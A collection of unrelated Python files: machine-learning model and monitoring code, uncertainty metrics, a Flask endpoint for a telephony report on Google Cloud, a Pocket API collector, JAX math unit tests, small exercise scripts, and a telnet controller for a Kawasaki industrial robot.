self.stat_helper = stat_helper
def install(self, exe):
exe.set_monitor_callback(self.stat_helper)
self.exes.append(exe)
def tic(self):
if self.step % self.interval == 0:
for exe in self.exes:
for array in exe.arg_arrays:
array.wait_to_read()
for array in exe.aux_arrays:
array.wait_to_read()
self.queue = []
self.activated = True
self.step += 1
def toc(self):
if not self.activated:
return []
for exe in self.exes:
for array in exe.arg_arrays:
array.wait_to_read()
for array in exe.aux_arrays:
array.wait_to_read()
for exe in self.exes:
for name, array in zip(exe._symbol.list_arguments(), exe.arg_arrays):
self.queue.append((self.step, name, self.stat_func(array)))
for name, array in zip(exe._symbol.list_auxiliary_states(), exe.aux_arrays):
# if self.re_prog.match(name):
self.queue.append((self.step, name, self.stat_func(array)))
self.activated = False
res = []
if self.sort:
self.queue.sort(key=lambda x: x[1])
for n, k, v_list in self.queue:
res.append((n, k, v_list))
self.queue = []
return res
def toc_print(self):
pass
def profiling_symbol(symbol, data_shape, data_name='data'):
monitor = Monitor()
model = mx.mod.Module(symbol)
model.bind(data_shapes=[(data_name, tuple(data_shape))])
model.install_monitor(monitor)
model.init_params()
monitor.tic()
model.forward(mx.io.DataBatch(data=(nd.ones(data_shape),)))
data_infos = monitor.toc()
module_json = symbol.tojson()
analyse(data_infos, module_json, data_name)
|
# sum = 0
# for x in range(0, 101):
# sum += x
# print(sum)
sum = 0
n = 99
while n > 0:
sum += n
n = n -2
print(sum) |
import numpy as np
def entropy(x):
return np.sum(-x * np.log(np.clip(x, 1e-8, 1)), axis=-1)
def mean_entropy(sampled_probabilities):
return entropy(np.mean(sampled_probabilities, axis=1))
def bald(sampled_probabilities):
predictive_entropy = entropy(np.mean(sampled_probabilities, axis=1))
expected_entropy = np.mean(entropy(sampled_probabilities), axis=1)
return predictive_entropy - expected_entropy
def var_ratio(sampled_probabilities):
top_classes = np.argmax(sampled_probabilities, axis=-1)
# count how many time repeats the strongest class
mode_count = lambda preds: np.max(np.bincount(preds))
modes = [mode_count(point) for point in top_classes]
ue = 1.0 - np.array(modes) / sampled_probabilities.shape[1]
return ue
def sampled_max_prob(sampled_probabilities):
mean_probabilities = np.mean(sampled_probabilities, axis=1)
top_probabilities = np.max(mean_probabilities, axis=-1)
return 1 - top_probabilities
def probability_variance(sampled_probabilities, mean_probabilities=None):
if mean_probabilities is None:
mean_probabilities = np.mean(sampled_probabilities, axis=1)
mean_probabilities = np.expand_dims(mean_probabilities, axis=1)
return ((sampled_probabilities - mean_probabilities) ** 2).mean(1).sum(-1)
|
from flask import Blueprint
from google.oauth2 import service_account
from google.auth.transport.requests import AuthorizedSession
from google.cloud import datastore
from google.cloud import bigquery
from google.cloud import storage
import datetime
import time
import dataflow_pipeline.massive as pipeline
import cloud_storage_controller.cloud_storage_controller as gcscontroller
import dataflow_pipeline.telefonia.detalle_predictivo_opt_beam as detalle_predictivo_opt_beam
from procesos.Telefonia.extraccion_service import (extraccion_service_general)
detalle_predictivo_opt_api = Blueprint('detalle_predictivo_opt_api', __name__)
########################### DEFINICION DE VARIABLES ###########################
fecha = time.strftime('%Y%m%d')
KEY_REPORT = "detalle_predictivo_opt"
CODE_REPORT = "campaing_3"
sin_datos = ''
type_report = 'api_reports_manager'
type_api = 'report'
table_id = '`contento-bi.telefonia.detalle_predictivo_opt`'
key_delete = 'ipdial_code'
########################### CODIGO #####################################################################################
@detalle_predictivo_opt_api.route("/detalle_predictivo_opt", methods=['GET']) #[[[[[[[[[[[[[[[[[[***********************************]]]]]]]]]]]]]]]]]]
def Ejecutar():
print ('################################# ENTRO AL DETALLE PREDICTIVO OPT')
schema = ['ID CAMPAIGN',
'NAME',
'LAST NAME',
'ID',
'DATE',
'TELEPHONE',
'RESULT',
'OPT1',
'OPT2',
'OPT3',
'OPT4',
'OPT5',
'OPT6',
'OPT7',
'OPT8',
'OPT9',
'OPT10',
'OPT11',
'OPT12',
'ID CALL'
]
print ('################################################## LLAMAMOS AL SERVICIO')
extraccion = extraccion_service_general(KEY_REPORT,CODE_REPORT,sin_datos,schema, table_id, key_delete, type_api, type_report)
print (extraccion)
if len(extraccion) == 5:
return ('Proceso no ejecutado (TODAS LAS INSTANCIAS ERRADAS)')
else:
filename = extraccion[0]
cloud_storage_rows = extraccion[1]
output = extraccion[2]
cont_excepciones = extraccion[3]
cont_no_contenido = extraccion[4]
cont_registros = extraccion[5]
cont_token = extraccion[6]
lista_instancias_excepcion = extraccion[7]
lista_instancias_sin_contenido = extraccion[8]
lista_instancias_token = extraccion[9]
sub_path = extraccion[10]
dateini = extraccion[11]
dateend = extraccion[12]
gcscontroller.create_file(filename, cloud_storage_rows, "ct-telefonia")
ejecutar = detalle_predictivo_opt_beam.run(output, KEY_REPORT)
storage_client = storage.Client()
bucket = storage_client.get_bucket('ct-telefonia')
blob = bucket.blob(sub_path + fecha + '.csv')
return ("Se acaba de ejecutar el proceso de " + KEY_REPORT + " Para actualizar desde: " + dateini + " hasta " + dateend +' con '+str(cont_registros)+' registros' +'\n' + "INFORMACION: <b>instancias con error --> </b>"+str(cont_excepciones) +'\n' +'DETALLE:'+str(lista_instancias_excepcion) + '\n'+'---------------------------------------' +'\n'+'<b>instancias sin contenido: </b>' +str(cont_no_contenido)+ '\n' +'DETALLE:' +str(lista_instancias_sin_contenido) +'---------------------------------------'+'\n'+'<b>instancias con problemas de TOKEN: </b> '+str(cont_token) + '\n'+'DETALLE: '+str(lista_instancias_token)+ '')
|
# The sum of the squares of the first ten natural numbers is,
#
# 12 + 22 + ... + 102 = 385
# The square of the sum of the first ten natural numbers is,
#
# (1 + 2 + ... + 10)2 = 552 = 3025
# Hence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is 3025 − 385 = 2640.
#
# Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.
sumofsquares=0
sumnum=0
for i in range(1,101):
sumofsquares+=i**2
sumnum+=i
squareofsums=sumnum**2
difference=squareofsums-sumofsquares
print(difference) |
import tensorflow as tf
import tensorflow.contrib.slim as slim
from utct.common.functor import Functor
class MnistModel(Functor):
def __init__(self):
super(MnistModel, self).__init__()
#self.param_bounds = {
# #'mdl_conv1a_nf': (6, 128),
# #'mdl_conv1b_nf': (6, 128),
# #'mdl_conv2a_nf': (6, 128),
# #'mdl_conv2b_nf': (6, 128),
# #'mdl_fc1_nh': (10, 500),
# 'mdl_drop2a_p': (0.0, 0.25),
# 'mdl_drop2b_p': (0.0, 0.25),
# 'mdl_drop3_p': (0.0, 0.50)}
self.img_h = 28
self.img_w = 28
def __call__(self,
#optimizer,
#data_augmentation,
num_classes=10,
act_fn=tf.nn.relu,
mdl_conv1a_nf=40,
mdl_conv1b_nf=60,
mdl_conv2a_nf=50,
mdl_conv2b_nf=75,
mdl_fc1_nh=75,
mdl_drop2a_p=0.033,
mdl_drop2b_p=0.097,
mdl_drop3_p=0.412,
is_training=True,
**kwargs):
x_name = "InputData"
with tf.name_scope(x_name):
x = tf.placeholder(dtype=tf.float32,
shape=(None, self.img_h, self.img_w, 1),
name='XX')
tf.GraphKeys.INPUTS = 'inputs'
tf.add_to_collection(tf.GraphKeys.INPUTS, x)
tf.GraphKeys.LAYER_TENSOR = 'layer_tensor'
tf.add_to_collection(tf.GraphKeys.LAYER_TENSOR + '/' + x_name, x)
y = tf.placeholder(dtype=tf.float32,
shape=(None, num_classes),
name='YY')
tf.GraphKeys.TARGETS = 'targets'
tf.add_to_collection(tf.GraphKeys.TARGETS, y)
if is_training:
global_is_training = tf.get_collection('is_training')[0]
if global_is_training:
is_training = False
y_est = self._calc_y_est(x,
num_classes,
act_fn,
mdl_conv1a_nf,
mdl_conv1b_nf,
mdl_conv2a_nf,
mdl_conv2b_nf,
mdl_fc1_nh,
mdl_drop2a_p if is_training else 0.0,
mdl_drop2b_p if is_training else 0.0,
mdl_drop3_p if is_training else 0.0,
is_training)
#loss = slim.losses.softmax_cross_entropy(y_est, y)
loss = self._categorical_crossentropy(y_est, y)
metric = self._accuracy(y_est, y)
return y_est, loss, metric
def _calc_y_est(self,
x,
num_classes,
act_fn,
mdl_conv1a_nf,
mdl_conv1b_nf,
mdl_conv2a_nf,
mdl_conv2b_nf,
mdl_fc1_nh,
mdl_drop2a_p,
mdl_drop2b_p,
mdl_drop3_p,
is_training):
conv1a = slim.conv2d(inputs=x, num_outputs=int(mdl_conv1a_nf), kernel_size=3, activation_fn=act_fn, scope='conv1a')
conv1b = slim.conv2d(inputs=conv1a, num_outputs=int(mdl_conv1b_nf), kernel_size=3, activation_fn=act_fn, scope='conv1b')
pool1 = slim.max_pool2d(inputs=conv1b, kernel_size=2, scope='pool1')
conv2a = slim.conv2d(inputs=pool1, num_outputs=int(mdl_conv2a_nf), kernel_size=3, activation_fn=act_fn, scope='conv2a')
drop2a = slim.dropout(inputs=conv2a, keep_prob=(1.0 - mdl_drop2a_p), is_training=is_training, scope='drop2a')
conv2b = slim.conv2d(inputs=drop2a, num_outputs=int(mdl_conv2b_nf), kernel_size=3, activation_fn=act_fn, scope='conv2b')
drop2b = slim.dropout(inputs=conv2b, keep_prob=(1.0 - mdl_drop2b_p), is_training=is_training, scope='drop2b')
pool2 = slim.max_pool2d(inputs=drop2b, kernel_size=2, scope='pool2')
flatten = slim.flatten(inputs=pool2, scope='flatten')
fc1 = slim.fully_connected(inputs=flatten, num_outputs=int(mdl_fc1_nh), activation_fn=act_fn, scope='fc1')
drop3 = slim.dropout(inputs=fc1, keep_prob=(1.0 - mdl_drop3_p), is_training=is_training, scope='drop3')
softmax = slim.fully_connected(inputs=drop3, num_outputs=num_classes, activation_fn=tf.nn.softmax, scope='fc2')
return softmax
def _categorical_crossentropy(self, y_pred, y_true):
EPSILON = 1e-10
with tf.name_scope("Crossentropy"):
y_pred /= tf.reduce_sum(y_pred,
reduction_indices=len(y_pred.get_shape())-1,
keep_dims=True)
# manual computation of crossentropy
y_pred = tf.clip_by_value(y_pred,
tf.cast(EPSILON, dtype=tf.float32),
tf.cast(1.-EPSILON, dtype=tf.float32))
cross_entropy = - tf.reduce_sum(
y_true * tf.log(y_pred),
reduction_indices=len(y_pred.get_shape())-1)
return tf.reduce_mean(cross_entropy)
def _accuracy(self, y_pred, y_true):
with tf.name_scope('Accuracy'):
correct_pred = tf.equal(tf.argmax(y_pred, 1), tf.argmax(y_true, 1))
acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32), name="name")
return acc
|
import unittest
from katas.kyu_7.string_chunks import string_chunk
class StringChunkTestCase(unittest.TestCase):
def test_equal_1(self):
self.assertEqual(string_chunk('codewars', 2),
['co', 'de', 'wa', 'rs'])
def test_equal_2(self):
self.assertEqual(string_chunk('thiskataeasy', 4),
['this', 'kata', 'easy'])
def test_equal_3(self):
self.assertEqual(string_chunk('hello world', 3),
['hel', 'lo ', 'wor', 'ld'])
def test_equal_4(self):
self.assertEqual(string_chunk('everlong', 100), ['everlong'])
def test_equal_5(self):
self.assertEqual(string_chunk(123), [])
def test_equal_6(self):
self.assertEqual(string_chunk('hello', 'z'), [])
|
import datetime
import json
import logging
import os
import pytz
import requests
from collectors.exceptions import DuplicateFound
from .generic import OAuthCollector
logger = logging.getLogger(__name__)
session = requests.session()
def get_timestamp_from_epoch(epoch_string):
epoch_time = int(epoch_string)
timestamp = datetime.datetime.fromtimestamp(epoch_time, pytz.UTC).isoformat("T") + "Z"
return timestamp
def get_epoch_from_timestamp(timestamp):
if isinstance(timestamp, str):
dt = datetime.datetime.strptime(timestamp[:19], "%Y-%m-%dT%H:%M:%S")
elif isinstance(timestamp, int):
return timestamp # it's already epoch
else:
dt = timestamp # timestamp is a datetime
epoch = datetime.datetime.utcfromtimestamp(0)
return int((dt - epoch).total_seconds())
class PocketCollector(OAuthCollector):
type = 'Pocket'
api_secrets_file = os.path.join('appkeys', 'pocket.json')
user_secrets_file = os.path.join("userkeys", "pocket.json")
def get_endpoints(self):
return dict(
request="https://getpocket.com/v3/oauth/request",
confirmation="https://getpocket.com/auth/authorize?"
"request_token={request_token}&redirect_uri={redirect_uri}",
authenticate="https://getpocket.com/v3/oauth/authorize",
retrieve="https://getpocket.com/v3/get",
)
def get_api_secrets(self):
try:
api_secrets = json.load(open(self.api_secrets_file))
except ValueError:
logger.error("Cannot read the API secrets for Pocket in %s." % self.api_secrets_file)
raise
else:
return api_secrets
def initial_parameters(self, **kwargs):
""" If we are not refreshing we ask pocket only from the time of last element """
result = super(PocketCollector, self).initial_parameters(
**kwargs
)
if not self.refresh_duplicates:
max_timestamp = self.db.max_timestamp(type=self.type)
result.update(dict(max_timestamp=max_timestamp))
return result
def run(self, **params):
refresh_duplicates = self.refresh_duplicates
# tried to use the Google OAuth implementation, but:
# * Pocket does not support GET requests
# * The Flow is quite not standard
last_timestamp = params.get('max_timestamp')
chunk_size = 5
credentials = self.authenticate()
endpoints = self.get_endpoints()
query = dict(
consumer_key=credentials['consumer_key'],
access_token=credentials['authentication_token'],
state="archive",
sort="newest",
detailType="complete",
count=chunk_size,
)
if last_timestamp:
query['since'] = get_epoch_from_timestamp(last_timestamp)
start_from = 0
count = 0
processed = 0
while True:
query['offset'] = start_from
# logger.debug("Asking chunk %d-%d" % (start_from, start_from + chunk_size))
response = session.post(
endpoints['retrieve'],
headers={"X-Accept": "application/json"},
data=query
)
if response.status_code != 200:
raise Exception("Error getting list of items from Pocket")
data = response.json()
returned_elements = len(data['list'])
# logger.debug("Pocket query returned %d elements" % returned_elements)
if data['list']:
for item_id, e in data['list'].items():
# there are other times eventually:
# "time_added", "time_updated", "time_read", "time_favorited"
# get the images & video sources, preserving the order
images = [e['images'][imgid]['src']
for imgid in sorted(list(e.get('images', {}).keys()))
]
videos = [e['videos'][imgid]['src']
for imgid in sorted(list(e.get('videos', {}).keys()))
]
title = e['resolved_title']
item = dict(
id=item_id,
type=self.type,
url=e['resolved_url'],
timestamp=parse_datetime(get_timestamp_from_epoch(e['time_updated'])),
timestamp_added=parse_datetime(get_timestamp_from_epoch(e['time_added'])),
title=title,
tags=list(e.get('tags', {}).keys()),
images=images,
videos=videos,
excerpt=e['excerpt'],
)
try:
processed += 1
self.db.upsert(item,
update=refresh_duplicates)
logger.info("{type} - {title} ({id})".format(type=self.type,
title=title, id=item_id))
count += 1
except DuplicateFound:
if not refresh_duplicates:
logger.debug(
"We already know this one. Stopping after %d added." % count)
return
if returned_elements < chunk_size:
break
start_from += chunk_size
logger.debug("Runner finished, after %d added, %d updated" % (count, processed))
def parse_datetime(timestamp):
return datetime.datetime.strptime(timestamp,
'%Y-%m-%dT%H:%M:%S+00:00Z')
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Unit tests for math."""
import functools
from absl.testing import absltest
import jax
from jax import random
from jax import test_util as jtu
import jax.numpy as jnp
import numpy as np
import scipy as sp
import tensorflow as tf
from internal import math
def safe_trig_harness(fn, max_exp):
x = 10**np.linspace(-30, max_exp, 10000)
x = np.concatenate([-x[::-1], np.array([0]), x])
y_true = getattr(np, fn)(x)
y = getattr(math, 'safe_' + fn)(x)
return y_true, y
class MathUtilsTest(jtu.JaxTestCase):
def test_sin(self):
"""In [-1e10, 1e10] safe_sin and safe_cos are accurate."""
for fn in ['sin', 'cos']:
y_true, y = safe_trig_harness(fn, 10)
self.assertLess(np.max(np.abs(y - y_true)), 1e-4)
self.assertFalse(jnp.any(jnp.isnan(y)))
# Beyond that range it's less accurate but we just don't want it to be NaN.
for fn in ['sin', 'cos']:
y_true, y = safe_trig_harness(fn, 60)
self.assertFalse(jnp.any(jnp.isnan(y)))
def test_psnr_round_trip(self):
"""MSE -> PSNR -> MSE is a no-op."""
mse = 0.07
self.assertAllClose(math.psnr_to_mse(math.mse_to_psnr(mse)), mse)
def test_learning_rate_decay(self):
np.random.seed(0)
for _ in range(10):
lr_init = np.exp(np.random.normal() - 3)
lr_final = lr_init * np.exp(np.random.normal() - 5)
max_steps = int(np.ceil(100 + 100 * np.exp(np.random.normal())))
lr_fn = functools.partial(
math.learning_rate_decay,
lr_init=lr_init,
lr_final=lr_final,
max_steps=max_steps)
# Test that the rate at the beginning is the initial rate.
self.assertAllClose(lr_fn(0), lr_init)
# Test that the rate at the end is the final rate.
self.assertAllClose(lr_fn(max_steps), lr_final)
# Test that the rate at the middle is the geometric mean of the two rates.
self.assertAllClose(lr_fn(max_steps / 2), np.sqrt(lr_init * lr_final))
# Test that the rate past the end is the final rate
self.assertAllClose(lr_fn(max_steps + 100), lr_final)
def test_delayed_learning_rate_decay(self):
np.random.seed(0)
for _ in range(10):
lr_init = np.exp(np.random.normal() - 3)
lr_final = lr_init * np.exp(np.random.normal() - 5)
max_steps = int(np.ceil(100 + 100 * np.exp(np.random.normal())))
lr_delay_steps = int(np.random.uniform(low=0.1, high=0.4) * max_steps)
lr_delay_mult = np.exp(np.random.normal() - 3)
lr_fn = functools.partial(
math.learning_rate_decay,
lr_init=lr_init,
lr_final=lr_final,
max_steps=max_steps,
lr_delay_steps=lr_delay_steps,
lr_delay_mult=lr_delay_mult)
# Test that the rate at the beginning is the delayed initial rate.
self.assertAllClose(lr_fn(0), lr_delay_mult * lr_init)
# Test that the rate at the end is the final rate.
self.assertAllClose(lr_fn(max_steps), lr_final)
# Test that the rate at after the delay is over is the usual rate.
self.assertAllClose(
lr_fn(lr_delay_steps),
math.learning_rate_decay(lr_delay_steps, lr_init, lr_final,
max_steps))
# Test that the rate at the middle is the geometric mean of the two rates.
self.assertAllClose(lr_fn(max_steps / 2), np.sqrt(lr_init * lr_final))
# Test that the rate past the end is the final rate
self.assertAllClose(lr_fn(max_steps + 100), lr_final)
def test_ssim_golden(self):
"""Test our SSIM implementation against the Tensorflow version."""
rng = random.PRNGKey(0)
shape = (2, 12, 12, 3)
for _ in range(4):
rng, key = random.split(rng)
max_val = random.uniform(key, minval=0.1, maxval=3.)
rng, key = random.split(rng)
img0 = max_val * random.uniform(key, shape=shape, minval=-1, maxval=1)
rng, key = random.split(rng)
img1 = max_val * random.uniform(key, shape=shape, minval=-1, maxval=1)
rng, key = random.split(rng)
filter_size = random.randint(key, shape=(), minval=1, maxval=10)
rng, key = random.split(rng)
filter_sigma = random.uniform(key, shape=(), minval=0.1, maxval=10.)
rng, key = random.split(rng)
k1 = random.uniform(key, shape=(), minval=0.001, maxval=0.1)
rng, key = random.split(rng)
k2 = random.uniform(key, shape=(), minval=0.001, maxval=0.1)
ssim_gt = tf.image.ssim(
img0,
img1,
max_val,
filter_size=filter_size,
filter_sigma=filter_sigma,
k1=k1,
k2=k2).numpy()
for return_map in [False, True]:
ssim_fn = jax.jit(
functools.partial(
math.compute_ssim,
max_val=max_val,
filter_size=filter_size,
filter_sigma=filter_sigma,
k1=k1,
k2=k2,
return_map=return_map))
ssim = ssim_fn(img0, img1)
if not return_map:
self.assertAllClose(ssim, ssim_gt)
else:
self.assertAllClose(np.mean(ssim, [1, 2, 3]), ssim_gt)
self.assertLessEqual(np.max(ssim), 1.)
self.assertGreaterEqual(np.min(ssim), -1.)
def test_ssim_lowerbound(self):
"""Test the unusual corner case where SSIM is -1."""
sz = 11
img = np.meshgrid(*([np.linspace(-1, 1, sz)] * 2))[0][None, ..., None]
eps = 1e-5
ssim = math.compute_ssim(
img, -img, 1., filter_size=sz, filter_sigma=1.5, k1=eps, k2=eps)
self.assertAllClose(ssim, -np.ones_like(ssim))
def test_srgb_linearize(self):
x = np.linspace(-1, 3, 10000) # Nobody should call this <0 but it works.
# Check that the round-trip transformation is a no-op.
self.assertAllClose(math.linear_to_srgb(math.srgb_to_linear(x)), x)
self.assertAllClose(math.srgb_to_linear(math.linear_to_srgb(x)), x)
# Check that gradients are finite.
self.assertTrue(
np.all(np.isfinite(jax.vmap(jax.grad(math.linear_to_srgb))(x))))
self.assertTrue(
np.all(np.isfinite(jax.vmap(jax.grad(math.srgb_to_linear))(x))))
def test_sorted_piecewise_constant_pdf_train_mode(self):
"""Test that piecewise-constant sampling reproduces its distribution."""
batch_size = 4
num_bins = 16
num_samples = 1000000
precision = 1e5
rng = random.PRNGKey(20202020)
# Generate a series of random PDFs to sample from.
data = []
for _ in range(batch_size):
rng, key = random.split(rng)
# Randomly initialize the distances between bins.
# We're rolling our own fixed precision here to make cumsum exact.
bins_delta = jnp.round(precision * jnp.exp(
random.uniform(key, shape=(num_bins + 1,), minval=-3, maxval=3)))
# Set some of the bin distances to 0.
rng, key = random.split(rng)
bins_delta *= random.uniform(key, shape=bins_delta.shape) < 0.9
# Integrate the bins.
bins = jnp.cumsum(bins_delta) / precision
rng, key = random.split(rng)
bins += random.normal(key) * num_bins / 2
rng, key = random.split(rng)
# Randomly generate weights, allowing some to be zero.
weights = jnp.maximum(
0, random.uniform(key, shape=(num_bins,), minval=-0.5, maxval=1.))
gt_hist = weights / weights.sum()
data.append((bins, weights, gt_hist))
# Tack on an "all zeros" weight matrix, which is a common cause of NaNs.
weights = jnp.zeros_like(weights)
gt_hist = jnp.ones_like(gt_hist) / num_bins
data.append((bins, weights, gt_hist))
bins, weights, gt_hist = [jnp.stack(x) for x in zip(*data)]
for randomized in [True, False]:
rng, key = random.split(rng)
# Draw samples from the batch of PDFs.
samples = math.sorted_piecewise_constant_pdf(
key,
bins,
weights,
num_samples,
randomized,
)
self.assertEqual(samples.shape[-1], num_samples)
# Check that samples are sorted.
self.assertTrue(jnp.all(samples[..., 1:] >= samples[..., :-1]))
# Verify that each set of samples resembles the target distribution.
for i_samples, i_bins, i_gt_hist in zip(samples, bins, gt_hist):
i_hist = jnp.float32(jnp.histogram(i_samples, i_bins)[0]) / num_samples
i_gt_hist = jnp.array(i_gt_hist)
# Merge any of the zero-span bins until there aren't any left.
while jnp.any(i_bins[:-1] == i_bins[1:]):
j = int(jnp.where(i_bins[:-1] == i_bins[1:])[0][0])
i_hist = jnp.concatenate([
i_hist[:j],
jnp.array([i_hist[j] + i_hist[j + 1]]), i_hist[j + 2:]
])
i_gt_hist = jnp.concatenate([
i_gt_hist[:j],
jnp.array([i_gt_hist[j] + i_gt_hist[j + 1]]), i_gt_hist[j + 2:]
])
i_bins = jnp.concatenate([i_bins[:j], i_bins[j + 1:]])
# Angle between the two histograms in degrees.
angle = 180 / jnp.pi * jnp.arccos(
jnp.minimum(
1.,
jnp.mean(
(i_hist * i_gt_hist) /
jnp.sqrt(jnp.mean(i_hist**2) * jnp.mean(i_gt_hist**2)))))
# Jensen-Shannon divergence.
m = (i_hist + i_gt_hist) / 2
js_div = jnp.sum(
sp.special.kl_div(i_hist, m) + sp.special.kl_div(i_gt_hist, m)) / 2
self.assertLessEqual(angle, 0.5)
self.assertLessEqual(js_div, 1e-5)
def test_sorted_piecewise_constant_pdf_large_flat(self):
"""Test sampling when given a large flat distribution."""
num_samples = 100
num_bins = 100000
key = random.PRNGKey(0)
bins = jnp.arange(num_bins)
weights = np.ones(len(bins) - 1)
samples = math.sorted_piecewise_constant_pdf(
key,
bins[None],
weights[None],
num_samples,
True,
)[0]
# All samples should be within the range of the bins.
self.assertTrue(jnp.all(samples >= bins[0]))
self.assertTrue(jnp.all(samples <= bins[-1]))
# Samples modded by their bin index should resemble a uniform distribution.
samples_mod = jnp.mod(samples, 1)
self.assertLessEqual(
sp.stats.kstest(samples_mod, 'uniform', (0, 1)).statistic, 0.2)
# All samples should collectively resemble a uniform distribution.
self.assertLessEqual(
sp.stats.kstest(samples, 'uniform', (bins[0], bins[-1])).statistic, 0.2)
def test_sorted_piecewise_constant_pdf_sparse_delta(self):
"""Test sampling when given a large distribution with a big delta in it."""
num_samples = 100
num_bins = 100000
key = random.PRNGKey(0)
bins = jnp.arange(num_bins)
weights = np.ones(len(bins) - 1)
delta_idx = len(weights) // 2
weights[delta_idx] = len(weights) - 1
samples = math.sorted_piecewise_constant_pdf(
key,
bins[None],
weights[None],
num_samples,
True,
)[0]
# All samples should be within the range of the bins.
self.assertTrue(jnp.all(samples >= bins[0]))
self.assertTrue(jnp.all(samples <= bins[-1]))
# Samples modded by their bin index should resemble a uniform distribution.
samples_mod = jnp.mod(samples, 1)
self.assertLessEqual(
sp.stats.kstest(samples_mod, 'uniform', (0, 1)).statistic, 0.2)
# The delta function bin should contain ~half of the samples.
in_delta = (samples >= bins[delta_idx]) & (samples <= bins[delta_idx + 1])
self.assertAllClose(jnp.mean(in_delta), 0.5, atol=0.05)
def test_sorted_piecewise_constant_pdf_single_bin(self):
"""Test sampling when given a small `one hot' distribution."""
num_samples = 625
key = random.PRNGKey(0)
bins = jnp.array([0, 1, 3, 6, 10], jnp.float32)
for randomized in [False, True]:
for i in range(len(bins) - 1):
weights = np.zeros(len(bins) - 1, jnp.float32)
weights[i] = 1.
samples = math.sorted_piecewise_constant_pdf(
key,
bins[None],
weights[None],
num_samples,
randomized,
)[0]
# All samples should be within [bins[i], bins[i+1]].
self.assertTrue(jnp.all(samples >= bins[i]))
self.assertTrue(jnp.all(samples <= bins[i + 1]))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
from telnetlib import IAC, DO, WILL, SB, SE, TTYPE, ECHO, DONT, WONT, NAOFFD
import telnetlib
import socket
import time
import threading
import os
import matlab.engine
def clear_all():
"""Clears all the variables from the workspace of the spyder application."""
gl = globals().copy()
for var in gl:
if var[0] == '_': continue
if 'func' in str(globals()[var]): continue
if 'module' in str(globals()[var]): continue
del globals()[var]
class Kawasaki:
"""
Python interface to connect, initite, and control progrmas for Kawasaki
Robotics. File X6 was originally recieved form James Hudak, Mechatronics
Lab assitant for Kennesaw State University, if number folling the 'x'
changes it simply reflects modified version.
*TCP port 23 uses the Transmission Control Protocol. TCP is one of the main
protocols in TCP/IP networks. Whereas the IP protocol deals only with
packets, TCP enables two hosts to establish a connection and exchange
streams of data. TCP guarantees delivery of data and also guarantees that
packets will be delivered on port 23 in the same order in which they were
sent. Guaranteed communication over port 23 is the key difference between
TCP and UDP. UDP port 23 would not have guaranteed communication in the
same way as TCP.
"""
def __init__(self, hostIp='192.168.0.30', port=23): # Defines a local IP address connecting to Robot, Port is set to 23 as it is the TCP/IP communications on PC, was recommended to use 10300?
self.BUFFER_SIZE = 512 # bytes # seconds # No robot movement should take more than 60 seconds
self.sock = None
self.sockjnts = None
self.hostIp = hostIp #
self.port = port
self.env_term = 'VT100'
self.user = "as"
self.telnet = telnetlib.Telnet()
#self.connect()
def telnet_process_options(self, socket, cmd, opt):
IS = b'\00'
if cmd == WILL and opt == ECHO: # hex:ff fb 01 name:IAC WILL ECHO description:(I will echo)
socket.sendall(IAC + DO + opt) # hex(ff fd 01), name(IAC DO ECHO), descr(please use echo)
elif cmd == DO and opt == TTYPE: # hex(ff fd 18), name(IAC DO TTYPE), descr(please send environment type)
socket.sendall(IAC + WILL + TTYPE) # hex(ff fb 18), name(IAC WILL TTYPE), descr(Dont worry, i'll send environment type)
elif cmd == SB:
socket.sendall(IAC + SB + TTYPE + IS + self.env_term.encode() + IS + IAC + SE)
# hex(ff fa 18 00 b"VT100" 00 ff f0) name(IAC SB TTYPE iS VT100 IS IAC SE) descr(Start subnegotiation, environment type is VT100, end negotation)
elif cmd == SE: # server letting us know sub negotiation has ended
pass # do nothing
else: print('Unexpected telnet negotiation')
def connect(self):
print(f'>Connecting to robot, IPv4:{self.hostIp}, port:{self.port}')
self.telnet.set_option_negotiation_callback(self.telnet_process_options)
self.telnet.open(self.hostIp, self.port, 1)
time.sleep(0.5) #Allow TELNET negotaion to finish
self.telnet.read_until(b"n: ")
self.telnet.write(self.user.encode() + b"\r\n")
self.telnet.read_until(b">")
print('>Connected succesfully\n')
def disconnect(self):
#Wrote this a bit different
print("Disconnecting")
command = b"signal(-2010)\r\n"
self.telnet.write(command)
#time.sleep(1)
print(self.telnet.read_until(b">").decode())
self.telnet.close()
def load_as_file(self, file_location='master.as'):
max_chars = 492 # Max amount of characters that can be accepted per write to kawa.
if file_location != None:
print('>Transfering {} to kawasaki'.format(file_location))
inputfile = open(file_location, 'r')
file_text = inputfile.read() # Store Kawasaki-as code from file in local varianle
text_split = [file_text[i:i+max_chars] for i in range(0, len(file_text), max_chars)] # Split AS code in sendable blocks
print(f'>File consists of {len(file_text)} characters')
self.telnet.write(b"load master.as\r\n")##########################
self.telnet.read_until(b".as").decode("ascii")
self.telnet.write(b"\x02A 0\x17")
self.telnet.read_until(b"\x17")
print('>Sending file.... maybe....')
for i in range(0, len(text_split), 1):
self.telnet.write(b"\x02C 0" + text_split[i].encode() + b"\x17")
self.telnet.read_until(b"\x17")
print('>Loaded {} of {}'.format(i+1,len(text_split)))
self.telnet.write(b"\x02" + b"C 0" + b"\x1a\x17")
self.telnet.write(b"\r\n")
self.telnet.read_until(b"E\x17")
self.telnet.write(b"\x02" + b"E 0" + b"\x17")
#Read until command prompt and continue
self.telnet.read_until(b">")
print(".... Done, great success!\n -Borat\n")
else: print('No file specified\n') #Lastknown check, was built and sent to robot#still True [yes] [no]
def abort_kill_all(self):
for command in ["pcabort "]:
for i in range(1, 6):
prog_number = str(i) + ":"
self.telnet.write(command.encode() + prog_number.encode() + b"\r\n")
self.telnet.read_until(b">")
for command in ["abort ", "pckill\r\n1", "kill\r\n1"]:
self.telnet.write(command.encode() + b"\r\n")
self.telnet.read_until(b">")
def kawa_callback(self,strCmd='0 0 0 0 0 0'):
command=b'exe master\r\n' #Runs pg goat
self.telnet.write(command)
print(self.telnet.read_until(b'xyzoats').decode('ascii'))
command=strCmd.encode() + b"\r\n"
self.telnet.write(command)
